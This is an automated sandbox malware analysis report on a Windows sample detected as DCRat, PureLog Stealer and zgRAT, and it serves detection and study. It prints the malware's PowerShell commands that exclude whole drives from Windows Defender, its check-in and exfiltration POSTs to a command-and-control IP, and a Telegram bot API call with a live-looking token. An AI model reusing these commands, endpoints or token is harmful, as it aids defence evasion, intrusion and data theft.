Windows Analysis Report
d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe

Overview

General Information

Sample name: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Analysis ID: 1531798
MD5: 670861d1059f9baf2a8525097157d1c2
SHA1: f7007917499121cd5107697593a9429911ae0e77
SHA256: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647caa476557eedb53f97c4
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe (PID: 4708 cmdline: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe" MD5: 670861D1059F9BAF2A8525097157D1C2)
    • powershell.exe (PID: 3524 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4424 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4052 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6592 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4464 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1784 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7128 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6148 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7172 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7244 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8864 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 9068 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 8288 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe (PID: 8536 cmdline: "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe" MD5: 670861D1059F9BAF2A8525097157D1C2)
  • JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe (PID: 8412 cmdline: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe" MD5: 670861D1059F9BAF2A8525097157D1C2)
    • powershell.exe (PID: 8888 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1656 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8760 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3836 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8772 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7608 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8484 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5996 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6656 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8680 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • smartscreen.exe (PID: 8488 cmdline: C:\Users\user\Downloads\smartscreen.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • smartscreen.exe (PID: 8496 cmdline: C:\Users\user\Downloads\smartscreen.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • WmiPrvSE.exe (PID: 8512 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • WmiPrvSE.exe (PID: 8556 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • svchost.exe (PID: 10000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Users\user\Downloads\smartscreen.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| C:\Users\user\Downloads\smartscreen.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Users\user\Downloads\smartscreen.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

                            System Summary

                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", CommandLine: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, NewProcessName: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, OriginalFileName: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", ProcessId: 8412, ProcessName: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessId: 4708, TargetFilename: C:\Recovery\WmiPrvSE.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", ParentImage: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, ParentProcessId: 8412, ParentProcessName: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8888, ProcessName: powershell.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe", ParentImage: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ParentProcessId: 4708, ParentProcessName: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3524, ProcessName: powershell.exe
                            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 5.42.66.51, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Initiated: true, ProcessId: 8412, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49798
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\Downloads\smartscreen.exe, CommandLine: C:\Users\user\Downloads\smartscreen.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Downloads\smartscreen.exe, NewProcessName: C:\Users\user\Downloads\smartscreen.exe, OriginalFileName: C:\Users\user\Downloads\smartscreen.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\Downloads\smartscreen.exe, ProcessId: 8488, ProcessName: smartscreen.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe", ParentImage: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ParentProcessId: 4708, ParentProcessName: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3524, ProcessName: powershell.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe", ParentImage: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ParentProcessId: 4708, ParentProcessName: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3524, ProcessName: powershell.exe
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 10000, ProcessName: svchost.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-11T20:37:35.009718+0200 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49798 | 5.42.66.51 | 80 | TCP |
| 2024-10-11T20:37:49.364405+0200 | 2048130 | 1 | A Network Trojan was detected | 192.168.2.5 | 49896 | 5.42.66.51 | 80 | TCP |
| 2024-10-11T20:37:12.962571+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 34.117.59.81 | 443 | TCP |

                            AV Detection

                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeAvira: detected
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Recovery\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeReversingLabs: Detection: 87%
                            Source: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeReversingLabs: Detection: 87%
                            Source: C:\Recovery\WmiPrvSE.exeReversingLabs: Detection: 87%
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\Desktop\ArFrORkS.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\EhviVOkL.logReversingLabs: Detection: 45%
                            Source: C:\Users\user\Desktop\KIRpkYvx.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\QyIevzpi.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\VWRNVcdg.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\fTGLCVSM.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\hILtgrfA.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\sBnSdgqk.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\uDZAyPvf.logReversingLabs: Detection: 45%
                            Source: C:\Users\user\Desktop\wjuqGuQY.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Downloads\smartscreen.exeReversingLabs: Detection: 87%
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeReversingLabs: Detection: 87%
                            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJoe Sandbox ML: detected
                            Source: C:\Recovery\WmiPrvSE.exeJoe Sandbox ML: detected
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeJoe Sandbox ML: detected
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FF848FAD35D

                            Networking

                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49798 -> 5.42.66.51:80
                            Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49896 -> 5.42.66.51:80
                            Source: unknownDNS query: name: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"Host: api.telegram.orgContent-Length: 86200Expect: 100-continueConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                            Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ipinfo.io
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 34.117.59.81:443
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 384Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2052Expect: 100-continueConnection: Keep-Alive
